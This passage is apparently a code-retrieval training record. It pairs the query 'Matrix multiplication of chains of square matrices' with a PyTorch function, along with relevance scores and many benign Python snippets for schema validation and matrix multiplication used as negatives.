"def is_valid(self):\n self.logger.debug(\"In is_valid.\")\n\n document = self._get_raw_doc()\n\n session = iHMPSession.get_session()\n self.logger.info(\"Got iHMP session.\")\n\n # _error_message is intentionally unused\n (valid, _error_message) = session.get_osdf().validate_node(document)\n\n if 'prepared_from' not in self._links.keys():\n self.logger.error(\"Must have a 'prepared_from' linkage.\")\n valid = False\n\n self.logger.debug(\"Valid? %s\", str(valid))\n\n return valid",
"def is_valid(self):\n self.logger.debug(\"In is_valid.\")\n\n document = self._get_raw_doc()\n\n session = iHMPSession.get_session()\n self.logger.info(\"Got iHMP session.\")\n\n (valid, _error_message) = session.get_osdf().validate_node(document)\n\n if 'associated_with' not in self._links.keys():\n valid = False\n\n self.logger.debug(\"Valid? %s\", str(valid))\n\n return valid",
"def is_valid(self):\n self.errors = {}\n self._process_data()\n self._validate_changes()\n return not self.errors",
"def check_valid_schema(context):\n data = context.response.json()\n validate_schema(data)",
"def is_wdl(schema_obj):\n\n if isinstance(schema_obj, schema.Field):\n if schema_obj.data_type == schema.Field.DataType.ENUM:\n return is_wdl(schema_obj.enum_type)\n elif schema_obj.data_type == schema.Field.DataType.STRUCT:\n return is_wdl(schema_obj.struct_type)\n else:\n wdl_prefixes = (\n 'wdl.',\n 'weave.common.',\n )\n return schema_obj.full_name.startswith(wdl_prefixes)",
"def same_schema(self):\n return self._same_schema",
"def _schema_has_natural_language_domains(schema: schema_pb2.Schema) -> bool:\n for f in schema.feature:\n if f.WhichOneof('domain_info') == 'natural_language_domain':\n return True\n return False",
"def validate_subset_of_schema(self, schema):\n self.validate_schema_type(schema)\n\n if self.label != schema.label:\n raise KeypointsSchemaError(\n \"Expected keypoints label '%s'; found '%s'\"\n % (schema.label, self.label)\n )\n\n self.attrs.validate_subset_of_schema(schema.attrs)",
"def validate(self) -> bool:\n required = self.crud.validate(required=True)\n if required:\n raise ValueError(\n f\"Validation error. Required destination fields are not present in the crosswalk: {required}\"\n )",
"def check(self, description: Description) -> bool:\n return all(c.check(description) for c in self.constraints)",
"def is_annotation_valid(self, annotation):\n\n if not isinstance(annotation, LabelFeature):\n return False\n\n if self._label_schema is None:\n return True\n valid = self._valid_confidences(annotation)\n valid &= self._valid_geometry(annotation)\n return valid",
"def _is_valid(self):\n self._is_allows_valid()\n self._is_denies_valid()",
"def test_schema_valid(path, name, data):\n schemas = metaschemas()\n if name in ('release-schema.json', 'release-package-schema.json'):\n metaschema = schemas['release_package_metaschema']\n elif name == 'record-package-schema.json':\n metaschema = schemas['record_package_metaschema']\n elif name in ('project-schema.json', 'project-package-schema.json'):\n metaschema = schemas['project_package_metaschema']\n else:\n metaschema = schemas['metaschema']\n\n validate_json_schema(path, name, data, metaschema)",
"def validate(json_data: json,\n schema_id: str,\n schema_store: dict = None,\n validate_schema: bool = False,\n schema_search_path: str = None\n ) -> Tuple[bool, iter]:\n try:\n if not schema_search_path:\n schema_search_path = path.join(path.dirname(__file__), 'schemas')\n\n if not schema_store:\n schema_store = get_schema_store(validate_schema, schema_search_path)\n\n schema = schema_store.get(f'{BASE_URI}/{schema_id}')\n if validate_schema:\n Draft7Validator.check_schema(schema)\n\n schema_file_path = path.join(schema_search_path, schema_id)\n resolver = RefResolver(f'file://{schema_file_path}.json', schema, schema_store)\n\n if Draft7Validator(schema,\n format_checker=Draft7Validator.FORMAT_CHECKER,\n resolver=resolver\n ) \\\n .is_valid(json_data):\n return True, None\n\n errors = Draft7Validator(schema,\n format_checker=Draft7Validator.FORMAT_CHECKER,\n resolver=resolver\n ) \\\n .iter_errors(json_data)\n return False, errors\n\n except SchemaError as error:\n # handle schema error\n return False, error",
"def validate(instance, schema, cls=None, *args, **kwargs):\r\n if cls is None:\r\n cls = validator_for(schema)\r\n cls.check_schema(schema)\r\n cls(schema, *args, **kwargs).validate(instance)",
"def is_valid(self, data_model: DataModel) -> bool:\n if data_model is None:\n return True\n\n return all(c.is_valid(data_model) for c in self.constraints)"
] | [
"0.738567",
"0.6994796",
"0.69861853",
"0.67255765",
"0.66746897",
"0.6557599",
"0.64317065",
"0.6430458",
"0.6274206",
"0.62662953",
"0.61832917",
"0.61832917",
"0.61646706",
"0.6147451",
"0.61017865",
"0.6056857",
"0.6008853",
"0.60003716",
"0.59765136",
"0.5948833",
"0.59400743",
"0.59253293",
"0.5921405",
"0.59120375",
"0.58401763",
"0.58131814",
"0.5810842",
"0.5766985",
"0.5763496",
"0.5755105",
"0.57346547",
"0.5713257",
"0.56749755",
"0.566753",
"0.56642854",
"0.56590825",
"0.5653834",
"0.5650287",
"0.56358695",
"0.5634916",
"0.56307656",
"0.5618653",
"0.5571728",
"0.5543085",
"0.5540507",
"0.55372036",
"0.55315834",
"0.55308753",
"0.5529992",
"0.55234826",
"0.55218005",
"0.5518533",
"0.55166024",
"0.54987687",
"0.54911405",
"0.54579014",
"0.544742",
"0.542342",
"0.5418332",
"0.5411131",
"0.5408007",
"0.53960705",
"0.53768516",
"0.5373706",
"0.5372288",
"0.53688055",
"0.53565603",
"0.53547204",
"0.53547204",
"0.53462535",
"0.5339555",
"0.53368723",
"0.5326432",
"0.5324012",
"0.5318696",
"0.53179073",
"0.52937156",
"0.52863616",
"0.5277034",
"0.5275659",
"0.5274688",
"0.52733",
"0.5272507",
"0.5268667",
"0.5260351",
"0.52591014",
"0.5254786",
"0.52512103",
"0.5223165",
"0.522269",
"0.52222043",
"0.52199787",
"0.52193534",
"0.5218476",
"0.5214592",
"0.52056044",
"0.5201611",
"0.519716",
"0.518397",
"0.5183397"
] | 0.81319565 | 0 |
Matrix multiplication of chains of square matrices | def chain_matmul_square(As):
As_matmul = As
while As_matmul.shape[0] > 1:
if As_matmul.shape[0] % 2:
A_last = As_matmul[-1:]
else:
A_last = None
As_matmul = torch.matmul(As_matmul[0:-1:2], As_matmul[1::2])
if A_last is not None:
As_matmul = torch.cat([As_matmul, A_last], dim=0)
return As_matmul.squeeze(0) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def recursive_multiply(a, b):\n if len(a) == 2:\n return naive_multiply(a, b)\n\n a11 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a11):\n a11[index] = row[0:int(len(row) / 2)]\n\n a12 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a12):\n a12[index] = row[int(len(a) / 2):len(a)]\n\n a21 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a21):\n a21[index] = row[0:int(len(row) / 2)]\n\n a22 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a22):\n a22[index] = row[int(len(a) / 2):len(a)]\n\n b11 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b11):\n b11[index] = row[0:int(len(row) / 2)]\n\n b12 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b12):\n b12[index] = row[int(len(b) / 2):len(b)]\n\n b21 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b21):\n b21[index] = row[0:int(len(row) / 2)]\n\n b22 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b22):\n b22[index] = row[int(len(b) / 2):len(b)]\n\n c11 = matrix_add(recursive_multiply(a11, b11), recursive_multiply(a12, b21)) # C11 = A11*B11 + A12*B21\n c12 = matrix_add(recursive_multiply(a11, b12), recursive_multiply(a12, b22)) # C12 = A11*B12 + A12*B22\n c21 = matrix_add(recursive_multiply(a21, b11), recursive_multiply(a22, b21)) # C21 = A21*B11 + A22*B21\n c22 = matrix_add(recursive_multiply(a21, b12), recursive_multiply(a22, b22)) # C22 = A21*B12 + A22*B22\n\n # Append c12 to c11\n for row_index, row in enumerate(c11):\n for col_index, col in enumerate(c12):\n row.append(c12[row_index][col_index])\n\n # Append c22 to c21\n for row_index, row in enumerate(c21):\n for col_index, col in enumerate(c12):\n row.append(c22[row_index][col_index])\n\n # Append c21 to c11\n for i in c21:\n c11.append(i)\n\n return c11",
"def __mul__(self, other):\n #\n # TODO - your code here\n #\n final_matrix = []\n for i in range(self.h):\n temp_row = []\n for j in range(other.w):\n # take dot-product of row of\n # matrix in 1st arg with col of\n # matrix in 2nd arg\n temp_row.append(dot_product(get_row(self.g, i), get_col(other.g, j)))\n final_matrix.append(temp_row)\n return Matrix(final_matrix)\n # TODO - your code here",
"def matrix_mult(m1, m2):\n pass",
"def _multi_matmul_chain_order(arrays):\n n = len(arrays)\n # p stores the dimensions of the matrices\n # Example for p: A_{10x100}, B_{100x5}, C_{5x50} --> p = [10, 100, 5, 50]\n # Using -2 to generalize for shapes that are more than 2 dimmensions\n p = [a.shape[-2] for a in arrays] + [arrays[-1].shape[-1]]\n # m is a matrix of costs of the subproblems\n # m[i,j]: min number of scalar multiplications needed to compute A_{i..j}\n m = np.zeros((n, n), dtype=np.double)\n # s is the actual ordering\n # s[i, j] is the value of k at which we split the product A_i..A_j\n s = np.empty((n, n), dtype=np.intp)\n\n for l in range(1, n):\n for i in range(n - l):\n j = i + l\n m[i, j] = np.inf\n for k in range(i, j):\n q = m[i, k] + m[k + 1, j] + p[i] * p[k + 1] * p[j + 1]\n if q < m[i, j]:\n m[i, j] = q\n s[i, j] = k # Note that Cormen uses 1-based index\n return s",
"def lazy_matrix_mul(m_a, m_b):\n return np.dot(m_a, m_b)",
"def matmul():\n\n if RESULT_IN_NVRAM:\n matrix_c = ResultMatrixInDaos()\n else:\n matrix_c = ResultMatrixInMemory()\n\n # This could be trivially optimized by reordering indexes\n # and caching either a_block or b_block (assuming C in-memory).\n # *However* it would result in unfair comparisons with the \n # previous implementation used elsewhere.\n # Using the naive algorithm makes sense for a raw comparison.\n for i in range(MATRIXSIZE):\n for j in range(MATRIXSIZE):\n partial_result_block = np.zeros((BLOCKSIZE, BLOCKSIZE))\n\n for k in range(MATRIXSIZE):\n a_block = np.fromstring(\n DAOS_KV[\"A%02d%02d\" % (i, k)],\n dtype=NP_FROMSTRING_DTYPE\n ).reshape((BLOCKSIZE, BLOCKSIZE))\n\n b_block = np.fromstring(\n DAOS_KV[\"B%02d%02d\" % (k, j)],\n dtype=NP_FROMSTRING_DTYPE\n ).reshape((BLOCKSIZE, BLOCKSIZE))\n\n partial_result_block += a_block @ b_block\n \n matrix_c[i,j] = partial_result_block\n\n return matrix_c",
"def multiply_matrices(a, b):\n try:\n x = len(b[0])\n except:\n b = make_2D(b)\n try:\n x = len(a[0])\n except:\n a = make_2D(a)\n if len(a[0]) != len(b):\n print 'error: matrices cannot be multiplied'\n return\n out = np.zeros((len(a), len(b[0])))\n for i in range(len(out)):\n for j in range(len(out[0])):\n sum = 0\n for k in range(len(a[i])):\n sum += a[i][k] * b[k][j]\n out[i][j] = sum\n return out",
"def multiply_matrices(list):\n # Section 1: Start matrix product using 1st matrix in list\n matrix_product = list[0]\n\n # Section 2: Loop thru list to create product\n for matrix in list[1:]:\n matrix_product = matrix_multiply(matrix_product, matrix)\n\n return matrix_product",
"def mat_mul(mat1, mat2):\n\n if len(mat1[0]) == len(mat2):\n\n mat2 = matrix_transpose(mat2)\n response = []\n\n for row in range(len(mat1)):\n response.append(\n [\n sum(dot_product(mat1[row], mat2[column]))\n for column in range(len(mat2))\n ]\n )\n\n return response\n\n else:\n return None",
"def lazy_matrix_mul(m_a, m_b):\n return (np.matmul(m_a, m_b))",
"def Multiply(M1,M2):\r\n M3=[]\r\n w=0\r\n while w<len(M2[0]):\r\n tap=[]\r\n t=0\r\n while t<len(M2):\r\n tap.append(M2[t][w])\r\n t=t+1\r\n M3.append(tap)\r\n w=w+1\r\n M=[]\r\n # Multiplying matrices\r\n k=0\r\n sums=0\r\n while k<len(M1):\r\n j=0\r\n mpy=[]\r\n while j<len(M3):\r\n p=0\r\n sums=0\r\n while p<len(M3[j]):\r\n temp = (M1[k][p])*(M3[j][p])\r\n sums=sums+temp\r\n p=p+1\r\n mpy.append(sums)\r\n j=j+1\r\n M.append(mpy)\r\n k=k+1\r\n return M",
"def lazy_matrix_mul(m_a, m_b):\n m_a = np.array(m_a)\n m_b = np.array(m_b)\n\n return m_a.dot(m_b)",
"def matrix_mult_matrix(matrix_a, matrix_b):\n m = len(matrix_a)\n n = len(matrix_b)\n result = []\n matrix_b_t = transpose_matrix(matrix_b)\n for i in xrange(m):\n row = []\n\tfor j in xrange(m):\n row.append(dot_product(matrix_a[i], matrix_b_t[j]))\n\tresult.append(row)\n return result",
"def python_nonsquare_matrix_mult(matrix):\n\n transposed_matrix = np.zeros([matrix.shape[1],matrix.shape[0]])\n start = time.time()\n # for i in range(matrix.shape[0]):\n # for j in range(matrix.shape[1]):\n # transposed_matrix[j,i] = matrix[i,j]\n\n transposed_matrix = np.transpose(matrix)\n product = matrix.dot(transposed_matrix)\n\n # transposed_matrix = np.transpose(matrix)\n end = time.time()-start\n\n # print(\"Python Golden Transpose: %s\" % product)\n # print('python transpose time: %.2E' % end)\n return [product, end]",
"def lazy_matrix_mul(m_a, m_b):\n return np.matmul(np.array(m_a), np.array(m_b))",
"def __matmul__(self, q: np.ndarray) -> np.ndarray:\n return self.product(q)",
"def matrixMul(self, matrix, matrix2):\n matrix0 = matrix[:]\n matrix[0] = matrix0[0] * matrix2[0] + matrix0[2]*matrix2[1] # + matrix0[4]*0\n matrix[1] = matrix0[1] * matrix2[0] + matrix0[3]*matrix2[1] # + matrix0[5]*0\n matrix[2] = matrix0[0] * matrix2[2] + matrix0[2]*matrix2[3] # + matrix0[4]*0\n matrix[3] = matrix0[1] * matrix2[2] + matrix0[3]*matrix2[3] # + matrix0[5]*0\n matrix[4] = matrix0[0] * matrix2[4] + matrix0[2]*matrix2[5] + matrix0[4]\n matrix[5] = matrix0[1] * matrix2[4] + matrix0[3]*matrix2[5] + matrix0[5]",
"def __mul__(self, other):\n # \n # TODO - your code here\n #\n \n result = [];\n row_result = [];\n product = 0;\n \n if(self.w != other.h):\n raise(ValueError, \"Matrices can not multiply for their dimesion doesn't match\"); \n \n for row in self.g:\n row_result = [];\n for j in range(other.w):\n product = dot_product(row,other.get_column(j));\n row_result.append(product);\n result.append(row_result);\n \n return Matrix(result);",
"def mat_mul(mat1, mat2):\n\n rows1 = len(mat1)\n cols1 = len(mat1[0])\n rows2 = len(mat2)\n cols2 = len(mat2[0])\n\n if cols1 != rows2:\n return None\n else:\n new_matrix = []\n for x in range(rows1):\n aux_row = []\n for y in range(cols2):\n aux_sum = []\n for z in range(cols1):\n aux_sum.append(mat1[x][z] * mat2[z][y])\n aux_row.append(sum(aux_sum))\n new_matrix.append(aux_row)\n\n return new_matrix",
"def combine_one_matrices(mul):\n factor, args = mul.as_coeff_matrices()\n new_args = [args[0]]\n\n for B in args[1:]:\n A = new_args[-1]\n if not isinstance(A, OneMatrix) or not isinstance(B, OneMatrix):\n new_args.append(B)\n continue\n new_args.pop()\n new_args.append(OneMatrix(A.shape[0], B.shape[1]))\n factor *= A.shape[1]\n\n return newmul(factor, *new_args)",
"def mmultiply(self, matrix):\n try:\n result_matrix = [[0 for row in range(len(self.matrix))] for col in range(len(matrix[0]))]\n for i in range(len(self.matrix)):\n for j in range(len(matrix[0])):\n for k in range(len(matrix)):\n result_matrix[i][j] += self.matrix[i][k] * matrix[k][j]\n self.matrix = result_matrix\n except IndexError:\n pass\n pass",
"def square_matrix_multiply(a, b):\n n = len(a)\n c = [[0]*n for _ in range(n)]\n for i in range(n):\n for j in range(n):\n sm = 0\n for k in range(n):\n sm += (a[i][k] * b[k][j])\n c[i][j] = sm\n\n return c",
"def __mul__(self,m):\n if type(m) != Matrix:\n raise TypeError('The second argument is not a matrix lol')\n if self.ncols != m.nrows:\n raise ValueError('matrix dot argument has incorrect number of rows')\n new = Matrix(self.nrows,m.ncols)\n columns = m.getCols()\n rowindex = 0\n colindex = 0 \n for row in self.matrix:\n colindex = 0 \n for col in columns:\n summ = 0\n for i,j in zip(row,col):\n summ+= i*j \n new.matrix[rowindex][colindex] = summ\n print new.matrix\n colindex += 1 \n rowindex+=1\n return new",
"def matMul(a, b):\n sa=matShape(a)\n sb=matShape(b)\n if sa[1]!=sb[0]: raise ValueError\n ret=matZeros((sa[0],sb[1]))\n for i in range(sa[0]):\n for j in range(sb[1]):\n val=0.0\n for k in range(sa[1]):\n val+=matGet(a,i,k)*matGet(b,k,j)\n matSet(ret,i,j,val)\n return ret",
"def MatMulOrder(D):\r\n\tnum = len(D)-1 # number of matrix in the chain\r\n\tprint(f\"There are {num} matrix to multiply\")\r\n\tM = [[0 for _ in range(num)] for _ in range(num)]\r\n\tP = [[0 for _ in range(num)] for _ in range(num)]\r\n\r\n\t# i要从大到小\r\n\t# i == j时, M[i][j]=0,所以不用更新\r\n\t# i-th矩阵到j-th矩阵的乘的最优值初始化为inf\r\n\tfor i in range(num-2, -1, -1):\r\n\t\tfor j in range(i+1, num):\r\n\t\t\tM[i][j] = 100000000\r\n\t\t\tfor k in range(i, j):\r\n\t\t\t\tnew = M[i][k] + M[k+1][j] + D[i]*D[k+1]*D[j+1]\r\n\t\t\t\tif new < M[i][j]:\r\n\t\t\t\t\tM[i][j] = new \r\n\t\t\t\t\tP[i][j] = k\r\n\treturn M, P",
"def matrix_mult(A,B):\n\n m = len(A)\n p = len(B)\n n = len(B[0])\n AB = []\n for i in range(m):\n AB.append([])\n for j in range(n):\n total = 0\n for k in range(p):\n total += A[i][k] * B[k][j]\n AB[i].append(total)\n return AB",
"def __matmul__(self, csys):\n self._transform(csys)\n return self",
"def matrix_mult(m1, m2):\n output = []\n for rowIndex, row in enumerate(m1): #go through rows in m1\n new_row = []\n for columnIndex in range(len(m2[0])): #go through indices for each column of m2\n sum = 0\n for index3 in range(len(row)):\n product = m1[rowIndex][index3] * m2[index3][columnIndex]\n sum += product\n new_row.append(sum)\n output.append(new_row)\n return output\n \n \n #output = []\n #first for loop corresponds to the rows of my output matrix and loops through the rows of m1 (enumerate)\n #create an empty new row\n # second for loop, loops through columns of m2\n # create sum variable, initialize it with zero\n # third for loop, multiplies the index of the row in m1 times the index of the column in m2\n # add sum to product and assign this to the sum variable\n # append sum to new row\n # append new row to output\n # return output",
"def __matmul__(self, B):\n m, n = self.shape\n n_, r = B.shape\n assert n == n_, (\"Cannot multiply shapes \"\n \"({}, {}) and ({}, {})\".format(m, n, n_, r))\n mul_ = dict()\n # compute A_ik = sum_j A_ij*B_jk\n for i in range(m):\n for k in range(r):\n prod = mpfr(0)\n for j in range(n):\n prod += self[i, j] * B[j, k]\n mul_[i, k] = prod\n return MPMatrix((m, r), mul_)",
"def _multi_matmul(arrays, order, i, j, constant=False) -> Tensor:\n if i == j:\n return arrays[i]\n else:\n return matmul(\n _multi_matmul(arrays, order, i, order[i, j], constant),\n _multi_matmul(arrays, order, order[i, j] + 1, j, constant),\n constant,\n )",
"def __mul__(self, other):\n if self.n != other.m:\n raise TypeError(\"Illegal dimensions for mul operator\")\n tmp = [[0 for _ in xrange(self.n)] for _ in xrange(other.m)]\n for i in xrange(self.n):\n for j in xrange(other.m):\n for k in xrange(other.n):\n tmp[i][j] += self.values[i][k] * other.values[k][j]\n res = []\n for i in tmp:\n res += i\n return simplematrix(self.n, other.m, res)",
"def combine_powers(mul):\n factor, args = mul.as_coeff_matrices()\n new_args = [args[0]]\n\n for i in range(1, len(args)):\n A = new_args[-1]\n B = args[i]\n\n if isinstance(B, Inverse) and isinstance(B.arg, MatMul):\n Bargs = B.arg.args\n l = len(Bargs)\n if list(Bargs) == new_args[-l:]:\n new_args = new_args[:-l] + [Identity(B.shape[0])]\n continue\n\n if isinstance(A, Inverse) and isinstance(A.arg, MatMul):\n Aargs = A.arg.args\n l = len(Aargs)\n if list(Aargs) == args[i:i+l]:\n identity = Identity(A.shape[0])\n new_args[-1] = identity\n for j in range(i, i+l):\n args[j] = identity\n continue\n\n if A.is_square == False or B.is_square == False:\n new_args.append(B)\n continue\n\n if isinstance(A, MatPow):\n A_base, A_exp = A.args\n else:\n A_base, A_exp = A, S.One\n\n if isinstance(B, MatPow):\n B_base, B_exp = B.args\n else:\n B_base, B_exp = B, S.One\n\n if A_base == B_base:\n new_exp = A_exp + B_exp\n new_args[-1] = MatPow(A_base, new_exp).doit(deep=False)\n continue\n elif not isinstance(B_base, MatrixBase):\n try:\n B_base_inv = B_base.inverse()\n except NonInvertibleMatrixError:\n B_base_inv = None\n if B_base_inv is not None and A_base == B_base_inv:\n new_exp = A_exp - B_exp\n new_args[-1] = MatPow(A_base, new_exp).doit(deep=False)\n continue\n new_args.append(B)\n\n return newmul(factor, *new_args)",
"def matrix_mult(m1, m2):\n\ttemp = []\n\tfor i in range(len(m1)):\n\t\te = []\n\t\tfor j in range(len(m2[0])):\n\t\t\te.append(row_times_column(m1,i,m2,j))\n\t\ttemp.append(e)\n\treturn temp",
"def MultiplyMatrix(matrixA, matrixB):\r\n # result matrix initialized as singularity matrix\r\n result = [[0 for y in range(len(matrixB[0]))] for x in range(len(matrixA))]\r\n for i in range(len(matrixA)):\r\n # iterate through columns of Y\r\n for j in range(len(matrixB[0])):\r\n # iterate through rows of Y\r\n for k in range(len(matrixB)):\r\n result[i][j] += matrixA[i][k] * matrixB[k][j]\r\n return result",
"def matrix_chain_dynamic(dimensions, n):\n\n m = [[-1 for _ in range(n)] for _ in range(n)]\n s = [[0 for _ in range(n)] for _ in range(n)]\n\n # multiplying matrix by itself\n for i in range(1, n):\n m[i][i] = 0\n\n for length in range(2, n):\n for i in range(1, n - length + 1):\n j = i + length - 1\n for k in range(i, j):\n cost = m[i][k] + m[k + 1][j] + dimensions[i - 1] * dimensions[k] * dimensions[j]\n if cost > m[i][j]:\n m[i][j] = cost\n # index if splitting\n s[i][j] = k\n return m, s",
"def form_square_block_matrix(mat1,mat2):\n if mat1.cols==1:\n mat3 = mp.matrix(mat1.rows+mat2.rows,1)\n mat3[:mat1.rows] = mat1[:]\n mat3[mat1.rows:mat3.rows] = mat2[:]\n else:\n mat3 = mp.matrix(mat1.rows+mat2.rows, mat1.rows+mat2.rows)\n mat3[:mat1.rows,:mat1.rows] = mat1[:,:]\n mat3[mat1.rows:mat3.rows,mat1.rows:mat3.rows] = mat2[:,:]\n return mat3",
"def mul(self,mat1,mat2):\n if(isinstance(mat2,int)==True):\n result = [[mat1[i][j] * mat2 for j in range(len(mat1[0]))] for i in range(len(mat1))]\n self.out = result\n return self.out\n elif(len(mat1[0])==len(mat2)):\n result = [[sum(a*b for a,b in zip(i,j)) for j in zip(*mat2)] for i in mat1]\n self.out = result\n return self.out",
"def matmul(a, b):\n raise NotImplementedError",
"def matmul(xs: List[List[float]],\n ys: List[List[float]]) -> List[List[float]]:\n product = []\n for x_row in range(len(xs)):\n row = []\n for y_col in range(len(ys[0])):\n col = [ys[y_row][y_col] for y_row in range(len(ys))]\n row.append(Math.dot(xs[x_row], col))\n product.append(row)\n return product",
"def multiply_matrices(A, B):\n # Section 1: Ensure A & B dimensions are correct for multiplication\n rowsA = len(A)\n colsA = len(A[0])\n rowsB = len(B)\n colsB = len(B[0])\n if colsA != rowsB:\n raise ArithmeticError(\n 'Number of A columns must equal number of B rows.')\n\n # Section 2: Store matrix multiplication in a new matrix\n C = zeros_matrix(rowsA, colsB)\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C",
"def multiM(*args):\r\n filas_1,filas_2 = len(args[0]),len(args[1])\r\n columnas_1,columnas_2 = len(args[0][0]),len(args[1][0])\r\n matriz_r = []\r\n for k in range(filas_1):\r\n matriz_r.append([0]*columnas_2)\r\n for i in range(columnas_2):\r\n matriz_r[k][i] = 0\r\n for i in range(filas_1):\r\n for j in range(columnas_1):\r\n for k in range(columnas_2):\r\n matriz_r[i][k] = matriz_r[i][k] + args[0][i][j] * args[1][j][k]\r\n return matriz_r",
"def __matmul__(self, tensor):\n return self.matmul(tensor)",
"def test_matrix_product(self, use_cache):\n\n key = jrandom.PRNGKey(0)\n dim = 50\n max_power = 25\n\n matrix = jrandom.normal(key, (dim, dim)) / 10\n vector = jnp.ones((dim,), dtype=jnp.float32)\n\n if use_cache:\n mpstate = model_utils.CachedMatrixPowerState.precompute(matrix, max_power)\n else:\n mpstate = model_utils.LazyMatrixPowerState(matrix)\n\n for t in range(max_power):\n result = mpstate.matrix_power_multiply(vector, t)\n expected = np.linalg.matrix_power(matrix, t) @ vector\n\n np.testing.assert_array_almost_equal(result, expected, decimal=1)",
"def __mul__(self, other):\r\n T = type(other)\r\n # mat4*scalar\r\n if T==types.FloatType or T==types.IntType or T==types.LongType:\r\n return mat4(map(lambda x,other=other: x*other, self.mlist))\r\n # mat4*vec3\r\n if isinstance(other, _vec3):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n w = float(m41*other.x + m42*other.y + m43*other.z + m44)\r\n return _vec3(m11*other.x + m12*other.y + m13*other.z + m14, \r\n m21*other.x + m22*other.y + m23*other.z + m24, \r\n m31*other.x + m32*other.y + m33*other.z + m34)/w\r\n # mat4*vec4\r\n if isinstance(other, _vec4):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n return _vec4(m11*other.x + m12*other.y + m13*other.z + m14*other.w, \r\n m21*other.x + m22*other.y + m23*other.z + m24*other.w, \r\n m31*other.x + m32*other.y + m33*other.z + m34*other.w,\r\n m41*other.x + m42*other.y + m43*other.z + m44*other.w)\r\n # mat4*mat4\r\n if isinstance(other, mat4):\r\n m11,m12,m13,m14,m21,m22,m23,m24,m31,m32,m33,m34,m41,m42,m43,m44 = self.mlist\r\n n11,n12,n13,n14,n21,n22,n23,n24,n31,n32,n33,n34,n41,n42,n43,n44 = other.mlist\r\n return mat4( m11*n11+m12*n21+m13*n31+m14*n41,\r\n m11*n12+m12*n22+m13*n32+m14*n42,\r\n m11*n13+m12*n23+m13*n33+m14*n43,\r\n m11*n14+m12*n24+m13*n34+m14*n44,\r\n\r\n m21*n11+m22*n21+m23*n31+m24*n41,\r\n m21*n12+m22*n22+m23*n32+m24*n42,\r\n m21*n13+m22*n23+m23*n33+m24*n43,\r\n m21*n14+m22*n24+m23*n34+m24*n44,\r\n\r\n m31*n11+m32*n21+m33*n31+m34*n41,\r\n m31*n12+m32*n22+m33*n32+m34*n42,\r\n m31*n13+m32*n23+m33*n33+m34*n43,\r\n m31*n14+m32*n24+m33*n34+m34*n44,\r\n\r\n m41*n11+m42*n21+m43*n31+m44*n41,\r\n m41*n12+m42*n22+m43*n32+m44*n42,\r\n m41*n13+m42*n23+m43*n33+m44*n43,\r\n m41*n14+m42*n24+m43*n34+m44*n44)\r\n # unsupported\r\n else:\r\n raise TypeError, \"unsupported operand type for *\"",
"def matrixMultiplication(firstMatrix, secondMatrix):\n if len(firstMatrix[0]) == len(secondMatrix): # Checks whether the matrices can be multiplied or not or not\n finalMatrix = []\n for y in range(len(firstMatrix)): # 2\n currentMatrix = []\n for i in range(len(secondMatrix[0])):\n currentSum = 0\n for j in range(len(secondMatrix)):\n currentSum += secondMatrix[j][i] * firstMatrix[y][j]\n currentMatrix.append(currentSum)\n print(\"This is my current matrix: \" + str(currentMatrix))\n finalMatrix.append(currentMatrix)\n print(\"This product of the two matrices is :) \" + str(finalMatrix))\n else:\n print(\"This operation cannot be done, make sure the rows of the first matrix is the same as the number of columns in the second matrix\")",
"def matrix_multiply(A,B):\n rowsA = len(A)\n colsA = len(A[0])\n\n rowsB = len(B)\n colsB = len(B[0])\n\n if colsA != rowsB:\n raise ArithmeticError('Number of A columns must equal number of B rows.')\n\n C = zeros_matrix(rowsA, colsB)\n\n for i in range(rowsA):\n for j in range(colsB):\n total = 0\n for ii in range(colsA):\n total += A[i][ii] * B[ii][j]\n C[i][j] = total\n\n return C",
"def matrixMul(a, b):\n # Initializing Empty Matrix\n c = [[0, 0], [0, 0]]\n # 2x2 matrix multiplication. Essentially O(1)\n for i in range(2):\n for j in range(2):\n for k in range(2):\n c[i][j] = (c[i][j] + (a[i][k] * b[k][j]))\n\n # Returning the products\n return c",
"def _matmult(A, x):\n b = []\n for a in A:\n b.append(sum([ai * xi for ai, xi in zip(a, x)]))\n return b",
"def matrix_mul(m_a, m_b):\n rows_a = 0\n cols_a = 0\n rows_b = 0\n cols_b = 0\n if type(m_a) is not list:\n raise TypeError(\"m_a must be a list\")\n if type(m_b) is not list:\n raise TypeError(\"m_b must be a list\")\n length = []\n for row in m_a:\n if type(row) is not list:\n raise TypeError(\"m_a must be a list of lists\")\n for row in m_b:\n if type(row) is not list:\n raise TypeError(\"m_b must be a list of lists\")\n if m_a == [] or m_a == [[]]:\n raise ValueError(\"m_a can't be empty\")\n if m_b == [] or m_b == [[]]:\n raise ValueError(\"m_b can't be empty\")\n for row in m_a:\n cols_a = 0\n for elem in row:\n if type(elem) is not int and type(elem) is not float:\n raise TypeError(\"m_a should contain only integers or floats\")\n cols_a += 1\n for row in m_b:\n cols_b = 0\n for elem in row:\n if type(elem) is not int and type(elem) is not float:\n raise TypeError(\"m_b should contain only integers or floats\")\n cols_b += 1\n for row in m_a:\n length.append(len(row))\n rows_a += 1\n if not len(set(length)) <= 1:\n raise TypeError(\"each row of m_a must be of the same size\")\n length.clear()\n for row in m_b:\n length.append(len(row))\n rows_b += 1\n if not len(set(length)) <= 1:\n raise TypeError(\"each row of m_b must be of the same size\")\n if cols_a != rows_b:\n raise ValueError(\"m_a and m_b can't be multiplied\")\n new = [[0 for i in range(cols_b)] for j in range(rows_a)]\n for new_rows in range(rows_a):\n for new_cols in range(cols_b):\n for i in range(cols_a):\n new[new_rows][new_cols] += m_a[new_rows][i] * m_b[i][new_cols]\n return new",
